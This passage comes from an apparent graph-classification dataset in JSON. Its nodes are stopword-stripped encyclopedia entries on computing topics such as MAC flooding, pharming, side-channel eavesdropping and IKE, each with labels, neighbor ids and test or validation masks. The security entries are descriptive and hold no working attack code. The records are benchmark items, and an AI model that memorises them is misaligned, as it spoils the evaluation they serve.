    "text": "Norton_AntiBot:norton antibot norton antibot developed symantec monitors applications damaging behavior application designed prevent computers hijacked controlled hackers according symantec 6 million computers hijacked majority users unaware computers hacked antibot designed used conjunction antivirus software unlike traditional antivirus products antibot use signatures delay vendor discovers virus distributes signature delay computers affected instead antibot attempts identify virus actions viruses malicious nature however antibot intended replace antivirus product program uses technology licensed sana security product discontinued avg acquired sana security january 2009 developing standalone program similar antibot called avg identity protection also discontinued integrated avg internet security 2011 product updates technical support available symantec one year customer last purchase renewal ed kim director product management symantec highlighted rise botnets botnet collection compromised computers known bots hackers usually control malicious purposes two main uses botnets include identity theft e-mail spam kim cited 29 percent increase bots first half 2006 second half six million active bots end 2006 7 june 2007 symantec released beta version norton antibot antibot designed supplement user existing antivirus software unlike traditional antivirus software antibot use signatures identify malware instead monitors running applications damaging malicious behavior licensing technology sana security antibot also supplement sonar technology symantec found norton antivirus 2007 norton internet security 2007 norton 360 similar antibot sonar monitors malicious behavior however sonar run continuously background virus scan specific products antibot made available general public 17 july 2007 16 january 2009 avg announced plans acquire sana security finalized j.r. smith ceo avg technologies highlighted 40,000 unique malware samples analysts see day noted time frame sample analyzed signature created emphasizing need instant protection since hackers constantly modifying malicious software evade signature detection often several strains variations one virus different classification signature symantec confirmed ceasing sales distribution norton antibot early 2009 product help updates would still available one year following customer last purchase renewal pc magazine noted antibot average ability identify malicious programs based behavior fact mistakenly mark legitimate program malicious testing however infected systems antibot failed install caused blue screens failed completely remove virus technical limitation antibot detect inactive malware since behavior software monitor",
    "neighbors": [
      5512,
      6797,
      4883,
      7955,
      6297,
      5924,
      2213,
      1708,
      7983,
      8368,
      2870,
      11065,
      3520,
      7362,
      2378,
      8398,
      7515,
      4956,
      9569,
      6643,
      10872,
      8572,
      9983
    ],
    "mask": "None"
  },
  {
    "node_id": 10904,
    "label": 4,
    "text": "Nilsimsa_Hash:nilsimsa hash nilsimsa anti-spam focused locality-sensitive hashing algorithm originally proposed cmeclax remailer operator 2001 reviewed ernesto damiani et al 2004 paper titled open digest-based technique spam detection goal nilsimsa generate hash digest email message digests two similar messages similar comparison cryptographic hash functions sha-1 md5 making small modification document substantially change resulting hash document paper suggests nilsimsa satisfies three requirements subsequent testing range file types identified nilsimsa hash significantly higher false positive rate compared similarity digest schemes tlsh ssdeep sdhash nilsimsa similarity matching taken consideration jesse kornblum developing fuzzy hashing 2006 used algorithms spamsum andrew tridgell 2002 several implementations nilsimsa exist open-source software",
    "neighbors": [
      6762
    ],
    "mask": "Test"
  },
  {
    "node_id": 10905,
    "label": 4,
    "text": "MAC_flooding:mac flooding computer networking media access control attack mac flooding technique employed compromise security network switches attack works forcing legitimate mac table contents switch forcing unicast flooding behavior potentially sending sensitive information portions network normally intended go switches maintain mac table maps individual mac addresses network physical ports switch allows switch direct data physical port recipient located opposed indiscriminately broadcasting data ports ethernet hub advantage method data bridged exclusively network segment containing computer data specifically destined typical mac flooding attack switch fed many ethernet frames containing different source mac addresses attacker intention consume limited memory set aside switch store mac address table effect attack may vary across implementations however desired effect attacker force legitimate mac addresses mac address table causing significant quantities incoming frames flooded ports flooding behavior mac flooding attack gets name launching successful mac flooding attack malicious user use packet analyzer capture sensitive data transmitted computers would accessible switch operating normally attacker may also follow arp spoofing attack allow retain access privileged data switches recover initial mac flooding attack mac flooding also used rudimentary vlan hopping attack prevent mac flooding attacks network operators usually rely presence one features network equipment",
    "neighbors": [
      9440,
      2947,
      7411,
      7895,
      6904,
      6013,
      4990
    ],
    "mask": "Test"
  },
  {
    "node_id": 10906,
    "label": 4,
    "text": "Greylisting:greylisting greylisting method defending e-mail users spam mail transfer agent mta using greylisting temporarily reject email sender recognize mail legitimate originating server try delay sufficient time elapsed email accepted server employing greylisting temporarily rejects email unknown suspicious sources sending 4xx reply codes please call back later defined simple mail transfer protocol smtp fully capable smtp implementations expected maintain queues retrying message transmissions cases legitimate mail may delayed still get temporary rejection issued different stages smtp dialogue allowing implementation store less data incoming message trade-off work bandwidth exact matching retries original messages rejecting message content received allows server store choice headers and/or hash message body addition whitelisting good senders greylister provide exceptions greylisting generally overridden fully validated tls connection matching certificate large senders often pool machines send resend email ip addresses most-significant 24 bits /24 treated equivalent cases spf records used determine sending pool similarly e-mail systems use unique per-message return-paths example variable envelope return path verp mailing lists sender rewriting scheme forwarded e-mail bounce address tag validation backscatter protection etc exact match sender address required every e-mail systems delayed greylisting systems try avoid delay eliminating variable parts verp using sender domain beginning local-part sender address greylisting effective mass email tools used spammers queue reattempt mail delivery normal regular mail transport agent delaying delivery also gives real-time blackhole lists similar lists time identify flag spam source thus subsequent attempts likely detected spam mechanisms greylisting delay main advantage user point view greylisting requires additional user configuration server utilizing greylisting configured appropriately end user notice delay first message given sender long sending email server identified belonging whitelisted group earlier messages mail sender repeatedly greylisted may worth contacting mail system administrator detailed headers delayed mail mail administrator point view benefit twofold greylisting takes minimal configuration get running occasional modifications local whitelists second benefit rejecting email temporary 451 error actual error code implementation dependent cheap system resources spam filtering tools intensive users cpu memory stopping spam hits filtering processes far fewer system resources used biggest disadvantage greylisting unrecognized servers destroys near-instantaneous nature email users come expect mail unrecognized servers typically delayed 15 minutes could delayed days poorly configured sending systems explaining users become accustomed immediate email delivery probably convince mail server uses greylisting behaving correctly particular problem websites require account created email address confirmed used – user greylisting mailserver attempts reset credentials website uses email confirmation password resets sending mta site poorly configured greylisting may delay initial email link extreme cases delivery delay imposed greylister exceed expiry time password reset token delivered email cases manual intervention may required whitelist website mailserver email containing reset token used expires mail server greylisted duration time initial delay re-transmission variable – something greylisting server control visibility smtp says retry interval least 30 minutes give-up time needs least 4–5 days actual values vary widely different mail server software modern greylisting applications postgrey unix-like operating systems automatically whitelist senders prove capable recovering temporary errors note irrespective reputed spamminess sender implementation also generally include ability manually whitelist mailservers one 2007 analysis greylisting considers totally undesirable due delay mail unreliable greylisting becomes widespread junkmailers adapt systems get around conclusion purpose greylisting reduce amount spam server spam-filtering software needs analyze resource-intensively save money servers reduce spam reaching users conclusion greylisting annoying much annoying spam current smtp specification rfc 5321 clearly states smtp client retains responsibility delivery message section 4.2.5 mail transmitted immediately must queued periodically retried sender section 4.5.4.1 mtas therefore queue retry messages small number typically handled whitelisting exception lists also legitimate mail might get delivered retry comes different ip address original attempt source email server farm goes kind relay service likely server original one make next attempt network fault tolerance ips belong completely unrelated address blocks thereby defying simple technique identifying significant part address since ip addresses different recipient server fail recognize series attempts related refuse turn continue message ages queue number servers large enough problem partially bypassed proactively identifying exceptions server farms likewise exception configured multihomed hosts hosts using dhcp extreme case sender could legitimately use different ipv6 address outbound smtp connection sender server subjected greylisting might also reattempt delivery another receiving mailserver receiving domain one mx record may cause problems hosts implement greylisting policy share database",
    "neighbors": [
      7049,
      1305,
      2969,
      412,
      5407,
      9909,
      3645,
      10184,
      5835,
      7764,
      6363,
      6492,
      3549,
      5470,
      2527,
      9824,
      6762,
      9588,
      10105
    ],
    "mask": "Test"
  },
  {
    "node_id": 10907,
    "label": 5,
    "text": "3G-324M:3g-324m 3g-324m 3gpp umbrella protocol video telephony 3g mobile networks 3g-324m protocol operates established circuit switched connection two communicating peers 3g-324m umbrella specification enable conversational multimedia communication circuit switched cs networks adopted 3gpp 3g-324m based itu-t h.324 specification multimedia conferencing circuit switched networks 3g-324m composed following sub-protocols 3g-324m specification using circuit switched network allows delay sensitive conversational multimedia services 3g-324m agnostic actual circuit switched network uses run easily umts well td-scdma networks 3g-324m proven solution conversational multimedia based services packet-based wireless networks deliver inherent overhead ber sensitivity variant routing delays 3g-324m operating circuit switched channel two communication peers guarantees fixed-delay quality service multimedia communications combining circuit switched 3g-324m services packet-based sip services presence leverage strength networks enable new types differentiated innovative mobile 3g services audio codec video codec",
    "neighbors": [
      10271
    ],
    "mask": "Test"
  },
  {
    "node_id": 10908,
    "label": 5,
    "text": "Internet_Key_Exchange:internet key exchange computing internet key exchange ike sometimes ikev1 ikev2 depending version protocol used set security association sa ipsec protocol suite ike builds upon oakley protocol isakmp ike uses x.509 certificates authentication ‒ either pre-shared distributed using dns preferably dnssec ‒ diffie–hellman key exchange set shared session secret cryptographic keys derived addition security policy every peer connect must manually maintained internet engineering task force ietf originally defined ike november 1998 series publications request comments known rfc 2407 rfc 2408 rfc 2409 rfc 4306 updated ike version two ikev2 december 2005 rfc 4718 clarified open details october 2006 rfc 5996 combined two documents plus additional clarifications updated ikev2 published september 2010 later update upgraded document proposed standard internet standard published rfc 7296 october 2014 parent organization ietf internet society isoc maintained copyrights standards freely available internet community ipsec implementations consist ike daemon runs user space ipsec stack kernel processes actual ip packets user-space daemons easy access mass storage containing configuration information ipsec endpoint addresses keys certificates required kernel modules hand process packets efficiently minimum overhead—which important performance reasons ike protocol uses udp packets usually port 500 generally requires 4–6 packets 2–3 round trips create sa security association sides negotiated key material given ipsec stack instance could aes key information identifying ip endpoints ports protected well type ipsec tunnel created ipsec stack turn intercepts relevant ip packets appropriate performs encryption/decryption required implementations vary interception packets done—for example use virtual devices others take slice firewall etc ikev1 consists two phases phase 1 phase 2 ike phase one purpose establish secure authenticated communication channel using diffie–hellman key exchange algorithm generate shared secret key encrypt ike communications negotiation results one single bi-directional isakmp security association sa authentication performed using either pre-shared key shared secret signatures public key encryption phase 1 operates either main mode aggressive mode main mode protects identity peers hash shared key encrypting aggressive mode ike phase two ike peers use secure channel established phase 1 negotiate security associations behalf services like ipsec negotiation results minimum two unidirectional security associations one inbound one outbound phase 2 operates quick mode originally ike numerous configuration options lacked general facility automatic negotiation well-known default case universally implemented consequently sides ike exactly agree type security association wanted create – option option – connection could established complications arose fact many implementations debug output difficult interpret facility produce diagnostic output ike specifications open significant degree interpretation bordering design faults dead-peer-detection case point giving rise different ike implementations able create agreed-upon security association many combinations options however correctly configured might appear either end need intent overhaul ike protocol described appendix rfc 4306 following issues addressed ietf ipsecme working group standardized number extensions goal modernizing ikev2 protocol adapting better high volume production environments extensions include ike supported part ipsec implementation windows 2000 windows xp windows server 2003 windows vista windows server 2008 isakmp/ike implementation jointly developed cisco microsoft microsoft windows 7 windows server 2008 r2 partially support ikev2 rfc 7296 well mobike rfc 4555 vpn reconnect feature also known agile vpn several open source implementations ipsec associated ike capabilities linux libreswan openswan strongswan implementations provide ike daemon configure i.e. establish sas klips xfrm/netkey kernel-based ipsec stacks xfrm/netkey linux native ipsec implementation available version 2.6 berkeley software distributions also ipsec implementation ike daemon importantly cryptographic framework openbsd cryptographic framework ocf makes supporting cryptographic accelerators much easier ocf recently ported linux significant number network equipment vendors created ike daemons ipsec implementations license stack one another number implementations ikev2 companies dealing ipsec certification interoperability testing starting hold workshops testing well updated certification requirements deal ikev2 testing icsa labs held latest ikev2 interoperability workshop orlando fl march 2007 13 vendors around world following open source implementations ikev2 currently available leaked nsa presentations released der spiegel indicate ike exploited unknown manner decrypt ipsec traffic isakmp researchers discovered logjam attack state breaking 1024-bit diffie–hellman group would break 66 vpn servers 18 top million https domains 26 ssh servers researchers claim consistent leaks.. claim refuted eyal ronen adi shamir paper critical review imperfect forward secrecy paul wouters libreswan article 66 vpn ’ fact broken ipsec vpn configurations allow negotiation multiple configurations subject mitm-based downgrade attacks offered configurations ikev1 ikev2 avoided careful segregation client systems onto multiple service access points stricter configurations",
    "neighbors": [
      7426,
      2947,
      5254,
      4874,
      8080,
      11413,
      3742,
      10016,
      420,
      11044,
      9383,
      6064,
      11569,
      823,
      3006,
      62,
      9151,
      8904,
      11133,
      1616,
      3792,
      6993,
      7252,
      3286,
      5084,
      732,
      5470,
      5472,
      1634,
      2531,
      8674,
      9442,
      4074,
      9722,
      6779,
      5245,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 10909,
    "label": 4,
    "text": "Computer_security_compromised_by_hardware_failure:computer security compromised hardware failure computer security compromised hardware failure branch computer security applied hardware objective computer security includes protection information property theft corruption natural disaster allowing information property remain accessible productive intended users secret information could retrieved different ways article focus retrieval data thanks misused hardware hardware failure hardware could misused exploited get secret data article collects main types attack lead data theft computer security comprised devices keyboards monitors printers thanks electromagnetic acoustic emanation example components computer memory network card processor thanks time temperature analysis example monitor main device used access data computer shown monitors radiate reflect data environment potentially giving attackers access information displayed monitor video display units radiate known compromising emanations tempest radiation code word u.s. government programme aimed attacking problem electromagnetic broadcast data significant concern sensitive computer applications eavesdroppers reconstruct video screen content radio frequency emanations radiated harmonic video signal shows remarkable resemblance broadcast tv signal therefore possible reconstruct picture displayed video display unit radiated emission means normal television receiver preventive measures taken eavesdropping video display unit possible distances several hundreds meters using normal black-and-white tv receiver directional antenna antenna amplifier even possible pick information types video display units distance 1 kilometer sophisticated receiving decoding equipment used maximum distance much greater displayed monitor reflected environment time-varying diffuse reflections light emitted crt monitor exploited recover original monitor image eavesdropping technique spying distance data displayed arbitrary computer screen including currently prevalent lcd monitors technique exploits reflections screen optical emanations various objects one commonly finds close proximity screen uses reflections recover original screen content objects include eyeglasses tea pots spoons plastic bottles even eye user attack successfully mounted spy even small fonts using inexpensive off-the-shelf equipment less 1500 dollars distance 10 meters relying expensive equipment allowed conduct attack 30 meters away demonstrating similar attacks feasible side street close building many objects may found usual workplace exploited retrieve information computer display outsider particularly good results obtained reflections user eyeglasses tea pot located desk next screen reflections stem eye user also provide good results however eyes harder spy distance fast-moving objects require high exposure times using expensive equipment lower exposure times helps remedy problem reflections gathered curved surfaces close objects indeed pose substantial threat confidentiality data displayed screen fully invalidating threat without time hiding screen legitimate user seems difficult without using curtains windows similar forms strong optical shielding users however aware risk may willing close curtains nice day reflection object computer display curved mirror creates virtual image located behind reflecting surface flat mirror virtual image size located behind mirror distance original object curved mirrors however situation complex computer keyboards often used transmit confidential data passwords since contain electronic components keyboards emit electromagnetic waves emanations could reveal sensitive information keystrokes electromagnetic emanations turned constitute security threat computer equipment figure presents keystroke retrieved material necessary approach acquire raw signal directly antenna process entire captured electromagnetic spectrum thanks method four different kinds compromising electromagnetic emanations detected generated wired wireless keyboards emissions lead full partial recovery keystrokes best practical attack fully recovered 95 keystrokes ps/2 keyboard distance 20 meters even walls keyboard specific fingerprint based clock frequency inconsistencies determine source keyboard compromising emanation even multiple keyboards model used time four different kinds way compromising electromagnetic emanations described key pressed released held keyboard sends packet information known scan code computer protocol used transmit scan codes bidirectional serial communication based four wires vcc 5 volts ground data clock clock data signals identically generated hence compromising emanation detected combination signals however edges data clock lines superposed thus easily separated obtain independent signals falling edge transition attack limited partial recovery keystrokes significant limitation gtt falling edge transition attack improved recover almost keystrokes indeed two traces exactly one data rising edge attackers able detect transition fully recover keystrokes harmonics compromising electromagnetic emissions come unintentional emanations radiations emitted clock non-linear elements crosstalk ground pollution etc determining theoretically reasons compromising radiations complex task harmonics correspond carrier approximately 4 mhz likely internal clock micro-controller inside keyboard harmonics correlated clock data signals describe modulated signals amplitude frequency full state clock data signals means scan code completely recovered harmonics keyboard manufacturers arrange keys matrix keyboard controller often 8-bit processor parses columns one-by-one recovers state 8 keys matrix scan process described 192 keys keys may used instance modern keyboards use 104/105 keys arranged 24 columns 8 rows columns continuously pulsed one-by-one least 3μs thus leads may act antenna generate electromagnetic emanations attacker able capture emanations easily recover column pressed key even signal fully describe pressed key still gives partial information transmitted scan code i.e column number note matrix scan routine loops continuously key pressed still signal composed multiple equidistant peaks emanations may used remotely detect presence powered computers concerning wireless keyboards wireless data burst transmission used electromagnetic trigger detect exactly key pressed matrix scan emanations used determine column belongs techniques target keyboards table sums technique could used find keystroke different kind keyboard paper called compromising electromagnetic emanations wired wireless keyboards martin vuagnoux sylvain pasini tested 12 different keyboard models ps/2 usb connectors wireless communication different setups semi-anechoic chamber small office adjacent office flat building table presents results attacks emanations caused human typing attracted interest recent years particular works showed keyboard acoustic emanations leak information exploited reconstruct typed text pc keyboards notebook keyboards vulnerable attacks based differentiating sound emanated different keys attack takes input audio signal containing recording single word typed single person keyboard dictionary words assumed typed word present dictionary aim attack reconstruct original word signal attack taking input 10-minute sound recording user typing english text using keyboard recovering 96 typed characters attack inexpensive hardware required parabolic microphone non-invasive require physical intrusion system attack employs neural network recognize key pressed combines signal processing efficient data structures algorithms successfully reconstruct single words 7-13 characters recording clicks made typing keyboard sound clicks differ slightly key key keys positioned different positions keyboard plate although clicks different keys sound similar human ear average 0.5 incorrect recognitions per 20 clicks shows exposure keyboard eavesdropping using attack attack efficient taking 20 seconds per word standard pc 90 better success rate finding correct word words 10 characters success rate 73 words tested practice human attacker typically determine text random attacker also identify occasions user types user names passwords short audio signals containing single word seven characters long considered means signal seconds long short words often chosen password dominant factors affecting attack success word length importantly number repeated characters within word procedure makes possible efficiently uncover word audio recordings keyboard click sounds recently extracting information another type emanations demonstrated acoustic emanations mechanical devices dot-matrix printers extracting private information watching somebody typing keyboard might seem easy task becomes extremely challenging automated however automated tool needed case long-lasting surveillance procedures long user activity human able reconstruct characters per minute paper clearshot eavesdropping keyboard input video presents novel approach automatically recovering text typed keyboard based solely video user typing automatically recognizing keys pressed user hard problem requires sophisticated motion analysis experiments show human reconstructing sentences requires lengthy hours slow-motion analysis video attacker might install surveillance device room victim might take control existing camera exploiting vulnerability camera control software might simply point mobile phone integrated camera laptop keyboard victim working public space balzarotti analysis divided two main phases figure first phase analyzes video recorded camera using computer vision techniques frame video computer vision analysis computes set keys likely pressed set keys certainly pressed position space characters results phase analysis noisy second phase called text analysis required goal phase remove errors using language context-sensitive techniques result phase reconstructed text word represented list possible candidates ranked likelihood acoustic emanations attack recovers dot-matrix printer processing english text printing possible based record sound printer makes microphone close enough attack recovers 72 printed words 95 knowledge text done microphone distance 10 cm printer upfront training phase picture attack b picture fully automated uses combination machine learning audio processing speech recognition techniques including spectrum features hidden markov models linear classification fundamental reason reconstruction printed text works emitted sound becomes louder needles strike paper given time correlation number needles intensity acoustic emanation training phase conducted words dictionary printed characteristic sound features words extracted stored database trained characteristic features used recognize printed english text task trivial major challenges include timing attacks enable attacker extract secrets maintained security system observing time takes system respond various queries ssh designed provide secure channel two hosts despite encryption authentication mechanisms uses ssh weaknesses interactive mode every individual keystroke user types sent remote machine separate ip packet immediately key pressed leaks inter-keystroke timing information users ’ typing picture represents command su processed ssh connection simple statistical techniques suffice reveal sensitive information length users ’ passwords even root passwords using advanced statistical techniques timing information collected network eavesdropper learn significant information users type ssh sessions time takes operating system send packet keypress general negligible comparing interkeystroke timing also enables eavesdropper learn precise interkeystroke timings users ’ typing arrival times packets data remanence problems affect obvious areas ram non-volatile memory cells also occur areas device hot-carrier effects change characteristics semiconductors device various effects examined alongside obvious memory-cell remanence problems possible analyse recover data cells semiconductor devices general long theory vanished electromigration means physically move atom new locations physically alter device another type attack involves relocation metal atoms due high current densities phenomenon atoms carried along electron wind opposite direction conventional current producing voids negative electrode hillocks whiskers positive electrode void formation leads local increase current density joule heating interaction electrons metal ions produce thermal energy producing electromigration effects external stress removed disturbed system tends relax back original equilibrium state resulting backflow heals electromigration damage long term though cause device failure less extreme cases simply serves alter device operating characteristics noticeable ways example excavations voids leads increased wiring resistance growth whiskers leads contact formation current leakage example conductor exhibits whisker growth due electromigration shown figure one example exhibits void formation case severe enough led complete failure shown figure contrary popular assumption drams used modern computers retain contents several seconds power lost even room temperature even removed motherboard many products cryptographic security-related computations using secret keys variables equipment operator must able read alter usual solution secret data kept volatile memory inside tamper-sensing enclosure security processors typically store secret key material static ram power removed device tampered temperatures −20 °c contents sram ‘ frozen ’ interesting know period time static ram device retain data power removed low temperatures increase data retention time sram many seconds even minutes maximillian dornseif presented technique slides let take control apple computer thanks ipod attacks needed first generic phase ipod software modified behaves master firewire bus ipod full read/write access apple computer ipod plugged firewire port firewire used audio devices printers scanners cameras gps etc generally device connected firewire full access read/write indeed ohci standard firewire standard reads device connected firewire read write data computer memory example device increase computational power processors generally equipped cache memory decreases memory access latency figure shows hierarchy processor memory first processor looks data cache l1 l2 memory data processor looking called cache-miss pictures show processor fetch data two cache levels unfortunately caches contain small portion application data introduce additional latency memory transaction case miss involves also additional power consumption due activation memory devices memory hierarchy miss penalty already used attack symmetric encryption algorithms like des basic idea proposed paper force cache miss processor executing aes encryption algorithm known plain text attacks allow unprivileged process attack process running parallel processor despite partitioning methods memory protection sandboxing virtualization carefully measuring amount time required perform private key operations attackers may able find fixed diffie-hellman exponents factor rsa keys break cryptosystems vulnerable system attack computationally inexpensive often requires known ciphertext attack treated signal detection problem signal consists timing variation due target exponent bit noise results measurement inaccuracies timing variations due unknown exponent bits properties signal noise determine number timing measurements required attack timing attacks potentially used cryptosystems including symmetric functions simple generic processor backdoor used attackers means privilege escalation get privileges equivalent given running operating system also non-privileged process one non-privileged invited domain running top virtual machine monitor get privileges equivalent virtual machine monitor loïc duflot studied intel processors paper cpu bugs cpu backdoors consequences security explains processor defines four different privilege rings numbered 0 privileged 3 least privileged kernel code usually running ring 0 whereas user-space code generally running ring 3 use security-critical assembly language instructions restricted ring 0 code order escalate privilege backdoor attacker must backdoors loïc duflot presents simple modify behavior three assembly language instructions simple specific activation conditions unlikely accidentally activated recent inventions begun target types processor-based escalation attacks",
    "neighbors": [
      9345,
      6406,
      9224,
      1801,
      5774,
      5245,
      5404,
      10658,
      939,
      7983,
      8122,
      8262,
      9926,
      1480,
      3529,
      9932,
      5585,
      11474,
      2901,
      9688,
      91,
      731,
      11487,
      1890,
      7780,
      10341,
      7527,
      9710,
      10734,
      3698,
      9714,
      2804,
      2294,
      119,
      5880,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10910,
    "label": 5,
    "text": "Amaya_(web_editor):amaya web editor amaya formerly amaya world discontinued free open source wysiwyg web authoring tool browsing abilities created structured editor project inria french national research institution later adopted world wide web consortium w3c testbed web standards role took arena web browser since last release january 2012 inria w3c stopped supporting project active development ceased amaya relatively low system requirements even comparison web browsers era active development period considered lightweight browser amaya originated direct descendant grif wysiwyg sgml editor created early 1980s html editor symposia based grif developed sold french software company grif sa last change code amaya feb 22 2013 used test-bed new web technologies supported major browsers amaya first client supported rdf annotation schema using xpointer browser available linux windows nt 95 mac os x amigaos sparc solaris aix osf/1 amaya formerly called tamaya tamaya name type tree represented logo later discovered tamaya also trademark used french company developers chose drop first letter make amaya",
    "neighbors": [
      513,
      6657,
      9736,
      6154,
      2579,
      6171,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      4171,
      5707,
      10834,
      6231,
      8281,
      6747,
      7785,
      1642,
      9834,
      9841,
      115,
      9843,
      4213,
      6775,
      3191,
      119,
      4728,
      124,
      637,
      1664,
      2182,
      6797,
      8351,
      4768,
      7340,
      7346,
      9394,
      9908,
      185,
      11449,
      4797,
      6338,
      7364,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      5356,
      11503,
      10486,
      2296,
      8443,
      9987,
      5380,
      7943,
      1807,
      8976,
      5907,
      278,
      3350,
      7965,
      7455,
      1834,
      7983,
      823,
      10057,
      11082,
      10060,
      2893,
      11112,
      8557,
      10611,
      1399,
      3961,
      6528,
      11650,
      3971,
      3462,
      8070,
      8584,
      6028,
      7572,
      5026,
      944,
      5054,
      10174,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      6629,
      487,
      8169,
      5612,
      494,
      1520,
      7152,
      6133,
      502,
      5622,
      5114,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10911,
    "label": 7,
    "text": "Bunchball:bunchball bunchball provides cloud-based software service gamification product intended help companies improve customer loyalty online engagement using game mechanics bunchball founded rajat paharia 2005 raised 17.5 million funding 2005 rajat paharia founded bunchball approached companies like facebook myspace dating websites proposition integrating social games bunchball received initial financing sunil singh ceo informance international payman pouladdej angel investor october 2006 company closed 2 million series investment round granite ventures adobe ventures 2007 nbc hired bunchball develop community website called dunder mifflin infinity popular comedy show office 2007 bunchball transitioned social gaming launched nitro allows organizations implement game mechanics social networks mobile applications websites january 2008 bunchball received additional 4 million series b funding round return investors granite ventures adobe ventures time announcement bunchball 28 employees june 2010 bunchball closed 6.5 million series c funding round triangle peak partners northport investments correlation ventures granite ventures bunchball 60 employees raised 21 million date bunchball nitro gamification platform aims motivate online user engagement contains set game mechanics including badges team points leader boards websites social communities mobile applications desktop enterprise applications currently generates 70 million unique users 2.3 billion actions month march 2012 bunchball released updated version nitro code-named flamethrower bunchball nitro salesforce motivates sales teams adding gamification salesforce.com jive gamification module add-on module jive social business platform powered bunchball nitro gives users set missions complete exposes critical piece functionality within jive platform nitro ibm connections helps businesses train new users keep existing users engaged within ibm connections application using nitro platform businesses employ gamification techniques like completing missions earning rewards engage users ibm connections 2007 40,000 people generated 1 million page views dunder mifflin infinity separate nbc universal website bunchball developed dunder mifflin infinity gives users experience employee dunder mifflin fictional company featured show 2009 usa network hired bunchball “ gamify ” website psych television show page views surged 16 million last season 9 million season average visitor came 4 5 times per month compared twice month previous season stayed site 22 minutes visit 14 minutes december 2010 bunchball nitro powered playboy ’ facebook app called miss social month-long competition women aspired playboy due competition playboy saw 85 percent rate re-engagement 60 percent improvement revenues one month next since starting app december playboy ’ active user base grown 80,000 2011 bunchball partnered los angeles kings gamify fan website",
    "neighbors": [
      4194,
      467,
      10090
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10912,
    "label": 7,
    "text": "Cloud_analytics:cloud analytics cloud analytics marketing term businesses carry analysis using cloud computing uses range analytical tools techniques help companies extract information massive data present way easily categorised readily available via web browser cloud analytics term set technological analytical tools techniques specifically designed help clients extract information massive data cloud analytics designed make official statistical data readily categorized available via users web browser aws analytics products amazon athena run interactive queries directly data amazon s3 amazon emr deploy open source big data frameworks like apache hadoop spark presto hbase flink amazon redshift fully managed petabyte-scale data warehouse run complex queries collections structured data google cloud analytics products google bigquery google fully managed low cost analytics data warehouse google cloud dataflow unified programming model managed service executing range data processing patterns including streaming analytics etl batch computation google cloud dataproc managed spark hadoop service process big datasets using open tools apache big data ecosystem google cloud composer fully managed workflow orchestration service author schedule monitor pipelines span across clouds on-premises data centers google cloud datalab interactive notebook based jupyter explore collaborate analyze visualize data google data studio turns data dashboards reports read shared customized google cloud dataprep data service visually exploring cleaning preparing structured unstructured data analysis google cloud pub/sub serverless large scale real-time messaging service allows send receive messages independent applications related azure services microsoft products hdinsight provision cloud hadoop spark r server hbase storm clusters data lake analytics distributed analytics service makes big data easy machine learning studio easily build deploy manage predictive analytics solutions cloud analytics tools juresse m'bambi",
    "neighbors": [
      11201,
      4194,
      3269,
      5960,
      4044
    ],
    "mask": "None"
  },
  {
    "node_id": 10913,
    "label": 7,
    "text": "Fan-out_(software):fan-out software message-oriented middleware solutions fan-out messaging pattern used model information exchange implies delivery spreading message one multiple destinations possibly parallel halting process executes messaging wait response message software construction fan-out class method number classes used class number methods called method",
    "neighbors": [
      1280,
      8929
    ],
    "mask": "None"
  },
  {
    "node_id": 10914,
    "label": 4,
    "text": "NBName:nbname nbname note capitalization computer program used carry denial-of-service attacks disable netbios services windows machines written sir dystic cult dead cow cdc released july 29 2000 def con 8 convention las vegas program decodes provides user netbios name packets receives udp port 137 many command line options effectively disable netbios network prevent computers rejoining according sir dystic nbname disable entire lans prevent machines rejoining ... nodes netbios network infected tool think names already used machines 'it impossible everyone figure going added",
    "neighbors": [
      1187,
      8135,
      10279,
      2409,
      6797,
      2007,
      11413,
      5111,
      7515,
      9214
    ],
    "mask": "None"
  },
  {
    "node_id": 10915,
    "label": 4,
    "text": "Pharming:pharming pharming cyber attack intended redirect website traffic another fake site pharming conducted either changing hosts file victim computer exploitation vulnerability dns server software dns servers computers responsible resolving internet names real ip addresses compromised dns servers sometimes referred poisoned pharming requires unprotected access target computer altering customer home computer rather corporate business server term pharming neologism based words farming phishing phishing type social-engineering attack obtain access credentials user names passwords recent years pharming phishing used gain information online identity theft pharming become major concern businesses hosting ecommerce online banking websites sophisticated measures known anti-pharming required protect serious threat antivirus software spyware removal software protect pharming malicious domain-name resolution result compromises large numbers trusted nodes participate name lookup vulnerable points compromise near leaves internet instance incorrect entries desktop computer hosts file circumvents name lookup local name ip address mapping popular target malware rewritten legitimate request sensitive website direct user fraudulent copy desktops often better targets pharming receive poorer administration internet servers worrisome host-file attacks compromise local network router since routers specify trusted dns clients join network misinformation spoil lookups entire lan unlike host-file rewrites local-router compromise difficult detect routers pass bad dns information two ways malconfiguration existing settings wholesale rewrite embedded software aka firmware many routers allow administrator specify particular trusted dns place one suggested upstream node e.g. isp attacker could specify dns server control instead legitimate one subsequent resolutions would go bad server scenario involving malicious javascript changes router dns server called drive-by pharming demonstrated stamm ramzan jakobsson december 2006 technical report alternatively many routers ability replace firmware i.e internal software executes device complex services like malware desktop systems firmware replacement difficult detect stealthy implementation appear behave manufacturer firmware administration page look settings appear correct etc approach well executed could make difficult network administrators discover reconfiguration device appears configured administrators intend actually redirects dns traffic background pharming one many attacks malicious firmware mount others include eavesdropping active man middle attacks traffic logging like misconfiguration entire lan subject actions pharming approaches academic interest however ubiquity consumer grade wireless routers presents massive vulnerability administrative access available wirelessly devices moreover since routers often work default settings administrative passwords commonly unchanged even altered many guessed quickly dictionary attacks since consumer grade routers n't introduce timing penalties incorrect login attempts administrative access granted router settings including firmware may altered attacks difficult trace occur outside home small office outside internet 15th january 2005 domain name large new york isp panix hijacked point website australia financial losses known domain later restored 17th january icann review blames melbourne known arq group result failure melbourne obtain express authorization sic registrant accordance icann inter-registrar transfer policy january 2008 symantec reported drive-by pharming incident directed mexican bank dns settings customer home router changed receipt e-mail appeared legitimate spanish-language greeting-card company term pharming controversial within field conference organized anti-phishing working group phillip hallam-baker denounced term marketing neologism designed convince banks buy new set security services",
    "neighbors": [
      5636,
      7557,
      3462,
      138,
      5774,
      3473,
      149,
      2213,
      5675,
      6064,
      5172,
      5433,
      10300,
      957,
      1088,
      3552,
